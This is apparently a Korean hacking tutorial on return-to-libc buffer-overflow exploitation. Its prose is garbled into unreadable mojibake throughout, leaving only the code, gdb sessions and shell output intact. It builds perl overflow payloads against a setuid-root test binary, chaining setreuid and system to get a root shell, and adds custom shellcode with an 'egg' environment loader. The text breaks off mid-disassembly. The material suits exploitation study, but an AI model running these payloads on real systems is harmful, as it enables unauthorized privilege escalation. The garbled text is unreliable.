�Ȧ�������������������������������������������������������������������������
��	            :: Return-to-Lib ��� �����ϱ�. ::                    ��
��                                                                        ��
��                            - w0rm9 in research.hackerschool.org        ��
��						w0rm9@hanmail.net         ��
�Ʀ�������������������������������������������������������������������������

����������������������������������������������������������������������������
  ��������
  ��������

  0x00. ���

  0x01. ���ް� ����� �����
  0x02. Return-to-Lib ����� �⺻
  0x03. ���ڵ� ���� BOF �ذ��ϱ�
  0x04. RTL������� ���ڵ� �����
  0x05. fake_ebp��...?

  0x06. ��ġ��.. 


�աաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաա�

����������������������������������������������������������������������������
  ��0x00. ��㦢
  ��������������

���ο� ��������� ������� ���� ������ �ƴ�����, ������� �ϳ��ϳ� �ǽ��� ����
ü���ϸ鼭 �ۼ��� �����Դϴ�.

���ط��� ������ ����� �߸� �����ϰ� �ְų�, �߸��� ������ ������ �����ٶ��ϴ�.

�� ������ Return-to-Lib�� ����� ���� ������ ��� �ֽ��ϴ�.
���� ��Ī�� �����մϴ�. 

�աաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաա�

������������������������������������������������������������������������������  
  ��0x01. ���ް� ����� �������
  ������������������������������

���ް� ����� ���ڵ尡 ���� ���� ������ ���� �����̰ų� 
���ڵ带 ���� �� ���� ȯ�濡�� BOF ������� ���� ���� ȹ���� �� �ִ� ���ݹ�� �� �ϳ��̴�.
������ ���α׷��� ����Ǵ� ������ �޸𸮱��� �ȿ��� ȯ�溯����, �ý��� �Լ� � ���Եǰ� �ȴ�.
�� system()�� ��ġ�� ã�Ƽ� �̿��ϴ°� ���ް� ����� �ٽ��̿���.
������ ������ Ŀ�ι����� ���Ǹ鼭 setreuid �ڵ尡 ������ �������� ������� �ʰ�, �ڽ��� ���� �������� �Ǿ���.
������ ������ ���ؼ� �˾ƺ���.

[root@RealSkulls WGD]# cat test.c
#include "dumpcode.h"

int main(int argc, char *argv[])
{
        char string[4];
        strcpy(string, argv[1]);
        dumpcode(string, 100);
}

[root@RealSkulls WGD]# gcc -o test test.c
[root@RealSkulls WGD]# chmod 4755 test

�ڼ��� �޸� ������ ���� �����ڵ��߰�^^;
���� �츮�� �˰� �ִ� ���ް� ������� �� ������ �ذ��� ����.

[w0rm9@RealSkulls WGD]$ gdb -q ./test
(gdb) b main
Breakpoint 1 at 0x8048598
(gdb) r
Starting program: /rs_members/w0rm9/tmp/WGD/test 

Breakpoint 1, 0x08048598 in main ()
(gdb) x/x system
0x4005e430 <system>:    0x83e58955
(gdb) q

/bin/sh�� �ּҴ� ������ ���α׷��� �ۼ��Ͽ� ã�� �� �ִ�.

[w0rm9@RealSkulls WGD]$ cat find.c
int main(int argc, char **argv)
{
        long shell;
        shell = 0x4005e430;
        while(memcmp((void*)shell,"/bin/sh",8)) shell++;
        printf("\"/bin/sh\" is at 0x%x\n",shell);
}

[w0rm9@RealSkulls WGD]$ gcc -o find find.c
[w0rm9@RealSkulls WGD]$ ./find 
"/bin/sh" is at 0x40149d24

�ý��� �Լ��� �ּ� : 0x4005e430
/bin/sh�� �ּ� : 0x40149d24
���� ����~
[w0rm9@RealSkulls WGD]$ perl -e 'system"./test","AAAAAAAA\x30\xe4\x05\x40\x41\x41\x41\x41\x24\x9d\x14\x40"'
0xbffffaa4  41 41 41 41 41 41 41 41 30 e4 05 40 41 41 41 41   AAAAAAAA0..@AAAA
0xbffffab4  24 9d 14 40 00 fb ff bf 2c 58 01 40 02 00 00 00   $..@....,X.@....
0xbffffac4  e4 82 04 08 00 00 00 00 05 83 04 08 92 85 04 08   ................
0xbffffad4  02 00 00 00 f4 fa ff bf cc 85 04 08 fc 85 04 08   ................
0xbffffae4  60 c6 00 40 ec fa ff bf 00 00 00 00 02 00 00 00   `..@............
0xbffffaf4  ef fb ff bf f6 fb ff bf 00 00 00 00 0b fc ff bf   ................
0xbffffb04  23 fc ff bf                                       #...
sh-2.05b$ id
uid=5013(w0rm9) gid=5013(w0rm9) groups=5013(w0rm9),11(RSRoot),10(wheel)

���� �ȶ���. ������� �ߴ�.
���ڵ忡���� setreuid�� �߰�������� ó�� ���ް� ��������� setreuid�� �߰��� �� �� ������?
�� ������ ���� 0x02���� �˾ƺ���.

�աաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաա�

����������������������������������������������������������������������������
  ��0x02. Return-to-Lib ����� �⺻ ��
  ������������������������������������

������ �ҽ��� ���� ���������� �Լ��� ȣ�������� ��� �Ǵ��� �˾ƺ���.

[root@RealSkulls WGD]# cat test2.c
#include "dumpcode.h"
void func1(){
        printf("First WGD\n");
}
void func2(){
        printf("I am w0rm9\n");
}
void func3(){
        printf("WiseGuys\n");
}
void func4(){
printf("Research Group\n");
}
int main(int argc, char* argv[]){
        char buf[4];

        strcpy(buf, argv[1]);
        dumpcode(buf, 100);
        printf("buf: %s\n", buf);
}

[root@RealSkulls WGD]# gcc -o test2 test2.c

gdb�� ���� �Լ��� ȣ��Ǵ� �����ּҸ� �˾ƺ���.

[root@RealSkulls WGD]# gdb -q test2
(gdb) disass func1
Dump of assembler code for function func1:
0x08048592 <func1+0>:   push   %ebp
0x08048593 <func1+1>:   mov    %esp,%ebp
0x08048595 <func1+3>:   sub    $0x8,%esp
0x08048598 <func1+6>:   sub    $0xc,%esp
0x0804859b <func1+9>:   push   $0x8048707
0x080485a0 <func1+14>:  call   0x80482c4 <printf>
0x080485a5 <func1+19>:  add    $0x10,%esp
0x080485a8 <func1+22>:  leave  
0x080485a9 <func1+23>:  ret    
End of assembler dump.
(gdb) disass func2
Dump of assembler code for function func2:
0x080485aa <func2+0>:   push   %ebp
0x080485ab <func2+1>:   mov    %esp,%ebp
0x080485ad <func2+3>:   sub    $0x8,%esp
0x080485b0 <func2+6>:   sub    $0xc,%esp
0x080485b3 <func2+9>:   push   $0x8048712
0x080485b8 <func2+14>:  call   0x80482c4 <printf>
0x080485bd <func2+19>:  add    $0x10,%esp
0x080485c0 <func2+22>:  leave  
0x080485c1 <func2+23>:  ret    
End of assembler dump.
(gdb) disass func3
Dump of assembler code for function func3:
0x080485c2 <func3+0>:   push   %ebp
0x080485c3 <func3+1>:   mov    %esp,%ebp
0x080485c5 <func3+3>:   sub    $0x8,%esp
0x080485c8 <func3+6>:   sub    $0xc,%esp
0x080485cb <func3+9>:   push   $0x804871e
0x080485d0 <func3+14>:  call   0x80482c4 <printf>
0x080485d5 <func3+19>:  add    $0x10,%esp
0x080485d8 <func3+22>:  leave  
0x080485d9 <func3+23>:  ret    
End of assembler dump.
(gdb) disass func4
Dump of assembler code for function func4:
0x080485da <func4+0>:   push   %ebp
0x080485db <func4+1>:   mov    %esp,%ebp
0x080485dd <func4+3>:   sub    $0x8,%esp
0x080485e0 <func4+6>:   sub    $0xc,%esp
0x080485e3 <func4+9>:   push   $0x8048728
0x080485e8 <func4+14>:  call   0x80482c4 <printf>
0x080485ed <func4+19>:  add    $0x10,%esp
0x080485f0 <func4+22>:  leave  
0x080485f1 <func4+23>:  ret    
End of assembler dump.
(gdb) 

�Լ��� ȣ���ּҸ��� �����غ��� ������ ����.
func1 : 0x08048592
func2 : 0x080485aa
func3 : 0x080485c2
func4 : 0x080485da

�Լ��� ���ڰ��� ������ �ʴ� ��� RET���� �����Ͽ� �Լ��� �ּҸ� ȣ���ϸ�..?

[root@RealSkulls WGD]# ./test2 `perl -e 'print "AAAAAAAA\x92\x85\x04\x08\xaa\x85\x04\x08\xc2\x85\x04\x08\xda\x85\x04\x08"'`
0xbffffa74  41 41 41 41 41 41 41 41 92 85 04 08 aa 85 04 08   AAAAAAAA........
0xbffffa84  c2 85 04 08 da 85 04 08 00 58 01 40 02 00 00 00   .........X.@....
0xbffffa94  e4 82 04 08 00 00 00 00 05 83 04 08 f2 85 04 08   ................
0xbffffaa4  02 00 00 00 c4 fa ff bf 40 86 04 08 70 86 04 08   ........@...p...
0xbffffab4  60 c6 00 40 bc fa ff bf 00 00 00 00 02 00 00 00   `..@............
0xbffffac4  cb fb ff bf d3 fb ff bf 00 00 00 00 ec fb ff bf   ................
0xbffffad4  04 fc ff bf                                       ....
buf: AAAAAAAA����?
First WGD
I am w0rm9
WiseGuys
Research Group
���׸����̼� ����

���º��� ���� ���������� �Լ����� ȣ��Ǿ���. ���װ� ��� ����ϰ� ������ �ϱ� ���ؼ� exit�� �߰����״�.

[root@RealSkulls WGD]# gdb -q test2
(gdb) b main
Breakpoint 1 at 0x80485f8
(gdb) r
Starting program: /rs_members/w0rm9/tmp/WGD/test2 

Breakpoint 1, 0x080485f8 in main ()
(gdb) x/x exit
0x400478d0 <exit>:      0x57e58955
(gdb) q
The program is running.  Exit anyway? (y or n) y
[root@RealSkulls WGD]# ./test2 `perl -e 'print "AAAAAAAA\x92\x85\x04\x08\xaa\x85\x04\x08\xc2\x85\x04\x08\xda\x85\x04\x08\xd0\x78\x04\x40"'`
0xbffffa74  41 41 41 41 41 41 41 41 92 85 04 08 aa 85 04 08   AAAAAAAA........
0xbffffa84  c2 85 04 08 da 85 04 08 d0 78 04 40 00 00 00 00   .........x.@....
0xbffffa94  e4 82 04 08 00 00 00 00 05 83 04 08 f2 85 04 08   ................
0xbffffaa4  02 00 00 00 c4 fa ff bf 40 86 04 08 70 86 04 08   ........@...p...
0xbffffab4  60 c6 00 40 bc fa ff bf 00 00 00 00 02 00 00 00   `..@............
0xbffffac4  c7 fb ff bf cf fb ff bf 00 00 00 00 ec fb ff bf   ................
0xbffffad4  04 fc ff bf                                       ....
buf: AAAAAAAA����?@
First WGD
I am w0rm9
WiseGuys
Research Group

����ϰ� �� �Ǿ���. �Լ��� ȣ������� �ٲ㺸��.

[root@RealSkulls WGD]# ./test2 `perl -e 'print "AAAAAAAA\xaa\x85\x04\x08\xc2\x85\x04\x08\xda\x85\x04\x08\x92\x85\x04\x08\xd0\x78\x04\x40"'`
0xbffffa74  41 41 41 41 41 41 41 41 aa 85 04 08 c2 85 04 08   AAAAAAAA........
0xbffffa84  da 85 04 08 92 85 04 08 d0 78 04 40 00 00 00 00   .........x.@....
0xbffffa94  e4 82 04 08 00 00 00 00 05 83 04 08 f2 85 04 08   ................
0xbffffaa4  02 00 00 00 c4 fa ff bf 40 86 04 08 70 86 04 08   ........@...p...
0xbffffab4  60 c6 00 40 bc fa ff bf 00 00 00 00 02 00 00 00   `..@............
0xbffffac4  c7 fb ff bf cf fb ff bf 00 00 00 00 ec fb ff bf   ................
0xbffffad4  04 fc ff bf                                       ....
buf: AAAAAAAA��??@
I am w0rm9
WiseGuys
Research Group
First WGD

�Լ��� ���������� ������� ȣ������� �����Ͽ� ����ȴٴ°� �� �� �ִ�.

�̹��� ���ڰ��� ���ϴ� �Լ��� ��� ��� ȣ���ϰ� �Ű������� ������� �־��ִ����� ���� ���� ������ ���� �˾ƺ���.

[root@RealSkulls WGD]# cat test3.c
#include "dumpcode.h"

void func1(int num){
        printf("w0rm9�� wiseguys %d���.\n", num);
}
void func2(int num){
        printf("z0nKT1g3r�� wiseguys %d���.\n", num);
}
int main(int argc, char* argv[]){
        char buf[4];

        fgets(buf, 100, stdin);
        dumpcode(buf, 100);
        printf("buf: %s\n", buf);
}

[root@RealSkulls WGD]# gcc -o test3 test3.c

w0rm9�� 2���̰�, ��ũ�� 1���̴ϱ� func1�� �Ű������� 2�� �;ߵǰ�, func2�� �Ű������� 1�� �;ߵȴ�.
���? ������ ������ �ʿ䰡 ����. �츮�� �̹� �˰��ִ�.
���ް� ����� RET�� system�ּҸ� ���� �� 4����Ʈ �ڿ� system�Լ��� �Ű������� �Ǵ� /bin/sh�� �־���.
�̹����� func1�� 4����Ʈ �ڿ� 2(0x00000002)�� �ְ�, func2�� 4����Ʈ �ڿ� 1(0x00000001)�� �־��.
���� gdb�� ���� �� �Լ����� �����ּҰ��� �˾ƺ���.

[w0rm9@RealSkulls WGD]$ gdb -q test3
(gdb) disas func1
Dump of assembler code for function func1:
0x080485b2 <func1+0>:   push   %ebp
0x080485b3 <func1+1>:   mov    %esp,%ebp
0x080485b5 <func1+3>:   sub    $0x8,%esp
0x080485b8 <func1+6>:   sub    $0x8,%esp
0x080485bb <func1+9>:   pushl  0x8(%ebp)
0x080485be <func1+12>:  push   $0x80486ff
0x080485c3 <func1+17>:  call   0x80482f4 <printf>
0x080485c8 <func1+22>:  add    $0x10,%esp
0x080485cb <func1+25>:  leave  
0x080485cc <func1+26>:  ret    
End of assembler dump.
(gdb) disas func2
Dump of assembler code for function func2:
0x080485cd <func2+0>:   push   %ebp
0x080485ce <func2+1>:   mov    %esp,%ebp
0x080485d0 <func2+3>:   sub    $0x8,%esp
0x080485d3 <func2+6>:   sub    $0x8,%esp
0x080485d6 <func2+9>:   pushl  0x8(%ebp)
0x080485d9 <func2+12>:  push   $0x8048719
0x080485de <func2+17>:  call   0x80482f4 <printf>
0x080485e3 <func2+22>:  add    $0x10,%esp
0x080485e6 <func2+25>:  leave  
0x080485e7 <func2+26>:  ret    
End of assembler dump.

func1 : 0x080485b2
func2 : 0x080485cd

[w0rm9@RealSkulls WGD]$ (printf "AAAAAAAA\xb2\x85\x04\x08\xcd\x85\x04\x08\x02\x00\x00\x00\x01\x00\x00\x00";cat)|./test3

0xbffff1d4  41 41 41 41 41 41 41 41 b2 85 04 08 cd 85 04 08   AAAAAAAA........
0xbffff1e4  02 00 00 00 01 00 00 00 0a 00 01 40 01 00 00 00   ...........@....
0xbffff1f4  04 83 04 08 00 00 00 00 25 83 04 08 e8 85 04 08   ........%.......
0xbffff204  01 00 00 00 24 f2 ff bf 38 86 04 08 68 86 04 08   ....$...8...h...
0xbffff214  60 c6 00 40 1c f2 ff bf 00 00 00 00 01 00 00 00   `..@............
0xbffff224  24 f3 ff bf 00 00 00 00 2c f3 ff bf 44 f3 ff bf   $.......,...D...
0xbffff234  4f f3 ff bf                                       O...
buf: AAAAAAAA��?
w0rm9�� wiseguys 2���.
z0nKT1g3r�� wiseguys 1���.

���׸����̼� ����

�ذ�ƴ�. �̷������� �Ű������� ���� �� �ִٸ� BOF������ ����� �� ���� �� �ϴ�.

�աաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաա�

����������������������������������������������������������������������������
  ��0x03. ���ڵ� ���� BOF �ذ��ϱ⦢
  ����������������������������������

���� ������ �ذ����� ���ߴ� bof������ �ذ��غ���.
RET�� setreuid�� ���� ���ؼ� streuid�� �ּҸ� �˾Ƴ����Ѵ�. 

[root@RealSkulls WGD]# cat test.c
#include "dumpcode.h"

int main(int argc, char *argv[])
{
        char string[4];
        strcpy(string, argv[1]);
        dumpcode(string, 100);
}

[w0rm9@RealSkulls WGD]$ ls -al test
-rwsr-xr-x    1 root     root        12325  1��  4 15:09 test
root �������� s�� �ɷ�������, �Ű������� 0�� ������ �ǰڴ�.

[w0rm9@RealSkulls WGD]$ gdb -q test
(gdb) b main
Breakpoint 1 at 0x8048598
(gdb) r
Starting program: /rs_members/w0rm9/tmp/WGD/test 

Breakpoint 1, 0x08048598 in main ()
(gdb) x/x setreuid
0x400f8cc0 <setreuid>:  0x83e58955

�ٽ� ������ ������ ������ �غ��� system()�� ���� /bin/sh�� ����DZ� ���� setreuid()�� ����Ǿ����, 
setreuid�� �Űܺ����� ������ root �������� ���� ��������. 
��, RET�� system���� ���°� �ƴ϶� setreuid�� ���� �� ���� �Լ��� ȣ���� system�� �ϰ�, ������ �Ű������� 
�� �Լ����� 4����Ʈ �ڿ� �־��ָ� �ǰڴ�.
[buf(4)][ebp(4)][ret(4)] �̷� ������
[buf(4)][ebp(4)][setreuid(4)][system(4)][0x00000000(4)][/bin/sh addr(4)] �̷��� �����ָ� �ǰڴ�.
������ ���� �������� setcpy �Լ��� ���⶧���� �ΰ��� ���� ���Ѵ�. ���Ƿ� 0x01010101�� �־��ֵ��� �ϰڴ�.

system : 0x4005e430
/bin/sh : 0x40149d24
setreuid : 0x400f8cc0

[w0rm9@RealSkulls WGD]$ perl -e 'system"./test","AAAAAAAA\xc0\x8c\x0f\x40\x30\xe4\x05\x40\x01\x01\x01\x01\x24\x9d\x14\x40"'
0xbffffaa4  41 41 41 41 41 41 41 41 c0 8c 0f 40 30 e4 05 40   AAAAAAAA...@0..@
0xbffffab4  01 01 01 01 24 9d 14 40 00 58 01 40 02 00 00 00   ....$..@.X.@....
0xbffffac4  e4 82 04 08 00 00 00 00 05 83 04 08 92 85 04 08   ................
0xbffffad4  02 00 00 00 f4 fa ff bf cc 85 04 08 fc 85 04 08   ................
0xbffffae4  60 c6 00 40 ec fa ff bf 00 00 00 00 02 00 00 00   `..@............
0xbffffaf4  eb fb ff bf f2 fb ff bf 00 00 00 00 0b fc ff bf   ................
0xbffffb04  23 fc ff bf                                       #...
sh-2.05b$ id
uid=16843009 gid=5013(w0rm9) groups=5013(w0rm9),11(RSRoot),10(wheel)

���� ����. uid=16843009�̴�. �̴� 16843009(Dec) == 01010101(Hex)�̱� �����̴�.
�ذ��� �� ���� �����ϱ�? BOF�� ����Ű�� �ٸ� �Լ���(scanf, fgets..)���� �׽�Ʈ�غ��� �������� �ذ�Ǿ���.
�׷��ٸ� strcpy���� uid=0 ���� �ٲٴ°� �Ұ����� ���ΰ�.?

�ٽ� �ѹ� ������ ������ ���캸�� ���������� �̹� 0x00000000�� �����ϰ��־���.
[w0rm9@RealSkulls WGD]$ ./test AAAA
0xbffffac4  41 41 41 41 00 fa ff bf 17 29 03 40 02 00 00 00   AAAA.....).@....
0xbffffad4  14 fb ff bf 20 fb ff bf 2c 58 01 40 02 00 00 00   .... ...,X.@....
0xbffffae4  e4 82 04 08 00 00 00 00 05 83 04 08 92 85 04 08   ................
0xbffffaf4  02 00 00 00 14 fb ff bf cc 85 04 08 fc 85 04 08   ................
0xbffffb04  60 c6 00 40 0c fb ff bf 00 00 00 00 02 00 00 00   `..@............
0xbffffb14  06 fc ff bf 0d fc ff bf 00 00 00 00 12 fc ff bf   ................
0xbffffb24  2a fc ff bf        

�׷� ������ setreuid�� �Ű������� �ǵ��� ������ ���� �����ϸ� ��� �ɱ�?
�������� �Լ��� �����ϱ� ���� printf�� �ּҸ� ����ߴ�.

[w0rm9@RealSkulls WGD]$ gdb -q test
(gdb) b main
Breakpoint 1 at 0x8048598
(gdb) r
Starting program: /rs_members/w0rm9/tmp/WGD/test 

Breakpoint 1, 0x08048598 in main ()
(gdb) x/x system
0x4005e430 <system>:    0x83e58955
(gdb) x/x setreuid
0x400f8cc0 <setreuid>:  0x83e58955
(gdb) x/x printf
0x4006ef80 <printf>:    0x83e58955
(gdb) 

0x00000000 �տ� system�� �ְ� �� �տ� setreuid�� �ְ� �� ���� ���۴� ��� printf�� ä��� �ǰڴ�.

[w0rm9@RealSkulls WGD]$ perl -e 'system"./test","AAAAAAAA\x80\xef\x06\x40\x80\xef\x06\x40\x80\xef\x06\x40\x80\xef\x06\x40\x80\xef\x06\x40\xc0\x8c\x0f\x40\x30\xe4\x05\x40"'
0xbffffa94  41 41 41 41 41 41 41 41 80 ef 06 40 80 ef 06 40   AAAAAAAA...@...@
0xbffffaa4  80 ef 06 40 80 ef 06 40 80 ef 06 40 c0 8c 0f 40   ...@...@...@...@
0xbffffab4  30 e4 05 40 00 00 00 00 05 83 04 08 92 85 04 08   0..@............
0xbffffac4  02 00 00 00 e4 fa ff bf cc 85 04 08 fc 85 04 08   ................
0xbffffad4  60 c6 00 40 dc fa ff bf 00 00 00 00 02 00 00 00   `..@............
0xbffffae4  dd fb ff bf e4 fb ff bf 00 00 00 00 09 fc ff bf   ................
0xbffffaf4  21 fc ff bf                                       !...
sh: line 1: ?�U��SP? command not found

��..��..system �Լ��� ���ؼ� �������� ����ƴ�.
�׷��ٸ� �� �κп��ٰ� /bin/sh�� ��ũ �ɾ������ �� �� �ϴ�. ���� PATH�� ������丮�� �߰���Ű��,
�����޽�����  err�� ��Ƽ� �����̸��� �ش�Ǵ� �κи� file�� �ְ� ��ũ�� ����.

[w0rm9@RealSkulls WGD]$ export PATH=$PATH:./
[w0rm9@RealSkulls WGD]$ perl -e 'system"./test","AAAAAAAA\x80\xef\x06\x40\x80\xef\x06\x40\x80\xef\x06\x40\x80\xef\x06\x40\x80\xef\x06\x40\xc0\x8c\x0f\x40\x30\xe4\x05\x40"' 2> err
0xbffffa94  41 41 41 41 41 41 41 41 80 ef 06 40 80 ef 06 40   AAAAAAAA...@...@
0xbffffaa4  80 ef 06 40 80 ef 06 40 80 ef 06 40 c0 8c 0f 40   ...@...@...@...@
0xbffffab4  30 e4 05 40 00 00 00 00 05 83 04 08 92 85 04 08   0..@............
0xbffffac4  02 00 00 00 e4 fa ff bf cc 85 04 08 fc 85 04 08   ................
0xbffffad4  60 c6 00 40 dc fa ff bf 00 00 00 00 02 00 00 00   `..@............
0xbffffae4  dd fb ff bf e4 fb ff bf 00 00 00 00 09 fc ff bf   ................
0xbffffaf4  21 fc ff bf                                       !...
[w0rm9@RealSkulls WGD]$ cat err|awk -F ':' '{print $3}'|awk -F ' ' '{print $1}' > file
[w0rm9@RealSkulls WGD]$ ln -s /bin/sh `cat file`

����� ��ũ�� �ɷȴ��� Ȯ���ϰ�, �ٽ� ������ �غ���.

[w0rm9@RealSkulls WGD]$ ls -al
�հ� 56
lrwxrwxrwx    1 w0rm9    w0rm9           7  1��  7 19:01 ???U??SP? -> /bin/sh       <===== ��ũ�Ǿ���
drwxrwxr-x    2 w0rm9    w0rm9        4096  1��  7 19:07 .
drwx------    7 w0rm9    w0rm9        4096  1��  4 17:39 ..
-rw-r--r--    1 root     root          582  6��  6  2001 dumpcode.h
-rw-rw-r--    1 w0rm9    w0rm9          41  1��  7 18:59 err
-rw-rw-r--    1 w0rm9    w0rm9          10  1��  7 19:07 file
-rw-r--r--    1 root     root          191  1��  4 17:38 findsh.c
-rw-rw-r--    1 w0rm9    w0rm9          41  1��  5 14:16 out
-rwsr-xr-x    1 root     root        12325  1��  4 19:01 test
-rw-r--r--    1 root     root          142  1��  4 19:01 test.c
-rw-r--r--    1 root     root          332  1��  4 17:38 test2.c
-rw-r--r--    1 root     root          162  1��  4 17:38 test4.c
[w0rm9@RealSkulls WGD]$ perl -e 'system"./test","AAAAAAAA\x80\xef\x06\x40\x80\xef\x06\x40\x80\xef\x06\x40\x80\xef\x06\x40\x80\xef\x06\x40\xc0\x8c\x0f\x40\x30\xe4\x05\x40"'
0xbffffa94  41 41 41 41 41 41 41 41 80 ef 06 40 80 ef 06 40   AAAAAAAA...@...@
0xbffffaa4  80 ef 06 40 80 ef 06 40 80 ef 06 40 c0 8c 0f 40   ...@...@...@...@
0xbffffab4  30 e4 05 40 00 00 00 00 05 83 04 08 92 85 04 08   0..@............
0xbffffac4  02 00 00 00 e4 fa ff bf cc 85 04 08 fc 85 04 08   ................
0xbffffad4  60 c6 00 40 dc fa ff bf 00 00 00 00 02 00 00 00   `..@............
0xbffffae4  db fb ff bf e2 fb ff bf 00 00 00 00 07 fc ff bf   ................
0xbffffaf4  1f fc ff bf                                       ....
[root@RealSkulls WGD]# id
uid=0(root) gid=5013(w0rm9) groups=5013(w0rm9),11(RSRoot),10(wheel)

root�� �ƴ�. ����-_-/

�աաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաա�

����������������������������������������������������������������������������
  ��0x04. RTL������� ���ڵ� ����� ��
  ������������������������������������

RTL������� ���� ���ڵ�� ��� ���� ���ݰ����� �η� �ڵ���� ����� �̾Ƴ��Ϳ� �Ұ��� ���� ���� �� �ִ�.
�Ӹ��ƴ϶� ������� �ش� �ý��ۿ� �����ϱ⵵ �ϴ�.
�׷��� ���ڴ� ���� ���ƶ� ���� �ʴ´�. �ϴ� �� ������ �˾ƺ���.

���� /bin/sh�� �ּ�, setreuid�� �ּ�, system�� �ּҰ� �ʿ��ϴ�.

[w0rm9@RealSkulls WGD]$ gdb -q test
(gdb) b main
Breakpoint 1 at 0x8048598
(gdb) r
Starting program: /rs_members/w0rm9/tmp/WGD/test 

Breakpoint 1, 0x08048598 in main ()
(gdb) x/x system
0x4005e430 <system>:    0x83e58955
(gdb) x/x setreuid
0x400f8cc0 <setreuid>:  0x83e58955
(gdb) q  
The program is running.  Exit anyway? (y or n) y
[w0rm9@RealSkulls WGD]$ cat findshell.c 
int main(int argc, char **argv)
{
        long shell;
        shell = 0x4005e430;
        while(memcmp((void*)shell,"/bin/sh",8)) shell++;
        printf("\"/bin/sh\" is at 0x%x\n",shell);
}
[w0rm9@RealSkulls WGD]$ gcc -o findshell findshell.c 
[w0rm9@RealSkulls WGD]$ ./findshell 
"/bin/sh" is at 0x40149d24
0x4005e430 <system>
0x400f8cc0 <setreuid>

�غ�� ������. �׷� ���ݽ� ���ÿ� ���� ������ �ݴ�� �ش� ������ push���ָ� �ǰڴ�.

[w0rm9@RealSkulls WGD]$ cat shellcode.c
int main(){
       __asm__("
               push    $0x40149d24	"/bin/sh addr"
               xor     %eax, %eax	"0 (���̴� ����)"
               push    %eax
               push    $0x4005e430	"systmem() addr"
               push    $0x400f8cc0	"setreuid() addr"
               ret
               ");
}

[w0rm9@RealSkulls WGD]$ gcc -o shellcode shellcode.c
shellcode.c:2:16: warning: multi-line string literals are deprecated
[w0rm9@RealSkulls WGD]$ ls -al shellcode
-rwxrwxr-x    1 w0rm9    w0rm9       11444  1��  4 17:50 shellcode

[w0rm9@RealSkulls WGD]$ objdump -d shellcode

�ʿ��� �κи� �����غ���.

080482f4 <main>:
 80482f4:       55                      push   %ebp
 80482f5:       89 e5                   mov    %esp,%ebp
 8048304:       68 24 9d 14 40          push   $0x40149d24
 8048309:       31 c0                   xor    %eax,%eax
 804830b:       50                      push   %eax
 804830c:       68 30 e4 05 40          push   $0x4005e430
 8048311:       68 c0 8c 0f 40          push   $0x400f8cc0
 8048316:       c3                      ret    

�� �κ��� egg�� ÷���ؼ� ����� �۵��ϴ��� �˾ƺ���.

[w0rm9@RealSkulls WGD]$ cat egg.c 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


#define DEFAULT_OFFSET          0
#define DEFAULT_BUFFER_SIZE     256
#define DEFAULT_EGG_SIZE        2048
#define NOP                     0x90


char shellcode[] =
"\x55\x89\xe5\x68\x24\x9d\x14\x40\x31\xc0\x50\x68\x30\xe4\x05\x40\x68\xc0\x8c\x0f\x40\xc3";

unsigned long get_sp(void)
{
        __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
        char    *buff, *ptr, *egg;
        long    *addr_ptr, addr;
        int     offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
        int     i, eggsize=DEFAULT_EGG_SIZE;

        if ( argc > 1 ) bsize = atoi(argv[1]);
        if ( argc > 2 ) offset = atoi(argv[2]);
        if ( argc > 3 ) eggsize = atoi(argv[3]);

        if ( !(buff = malloc(bsize)))
        {
                printf("Can't allocate memory for bsize\n");
                exit(0);
        }

        if ( !(egg = malloc(eggsize)))
        {
                printf("Can't allocate memory for eggsize");
                exit(0);
        }

        addr = get_sp() - offset;
        printf("Using address: 0x%x\n", addr);

        ptr = buff;
        addr_ptr = (long *)ptr;
        for(i = 0; i < bsize; i+= 4)
                *(addr_ptr++) = addr;

        ptr = egg;
        for(i = 0; i < eggsize - strlen(shellcode) - 1; i++)
                *(ptr++) = NOP;

        for(i = 0; i < strlen(shellcode); i++)
                *(ptr++) = shellcode[i];

        buff[bsize - 1] = '\0';
        egg[eggsize - 1] = '\0';

        memcpy(egg, "EGG=", 4);
        putenv(egg);
        memcpy(buff, "RET=", 4);
        putenv(buff);
        system("/bin/bash");
}

[w0rm9@RealSkulls WGD]$ gcc -o egg egg.c
[w0rm9@RealSkulls WGD]$ ./egg
Using address: 0xbffffa98
[w0rm9@RealSkulls WGD]$ ./test `perl -e 'print "AAAAAAAA\x98\xfa\xff\xbf"'`
0xbffff1d4  41 41 41 41 41 41 41 41 98 fa ff bf 00 00 00 00   AAAAAAAA........
0xbffff1e4  24 f2 ff bf 30 f2 ff bf 2c 58 01 40 02 00 00 00   $...0...,X.@....
0xbffff1f4  e4 82 04 08 00 00 00 00 05 83 04 08 92 85 04 08   ................
0xbffff204  02 00 00 00 24 f2 ff bf cc 85 04 08 fc 85 04 08   ....$...........
0xbffff214  60 c6 00 40 1c f2 ff bf 00 00 00 00 02 00 00 00   `..@............
0xbffff224  18 f3 ff bf 1f f3 ff bf 00 00 00 00 2c f3 ff bf   ............,...
0xbffff234  44 f3 ff bf                                       D...
sh-2.05b# id
uid=0(root) gid=5013(w0rm9) groups=5013(w0rm9),11(RSRoot),10(wheel)

�աաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաա�

����������������������������������������������������������������������������
  ��0x05. fake_ebp��...?��
  ������������������������

���������� �˾ƺ� fake_ebp�̴�. �� �״�� ebp�� ���̴� �۾��̴�.
���α׷����� RET�� ��ġ�� leaveret�� ���� ebp�� ��ġ�� Ȯ���Ͽ� ret�� �����Ѵ�.

[w0rm9@RealSkulls WGD]$ gdb -q test
(gdb) disas main 
Dump of assembler code for function main:
0x08048592 <main+0>:    push   %ebp
0x08048593 <main+1>:    mov    %esp,%ebp
0x08048595 <main+3>:    sub    $0x8,%esp
0x08048598 <main+6>:    and    $0xfffffff0,%esp
0x0804859b <main+9>:    mov    $0x0,%eax
0x080485a0 <main+14>:   sub    %eax,%esp
0x080485a2 <main+16>:   sub    $0x8,%esp
0x080485a5 <main+19>:   mov    0xc(%ebp),%eax
0x080485a8 <main+22>:   add    $0x4,%eax
0x080485ab <main+25>:   pushl  (%eax)
0x080485ad <main+27>:   lea    0xfffffffc(%ebp),%eax
0x080485b0 <main+30>:   push   %eax
0x080485b1 <main+31>:   call   0x80482d4 <strcpy>
0x080485b6 <main+36>:   add    $0x10,%esp
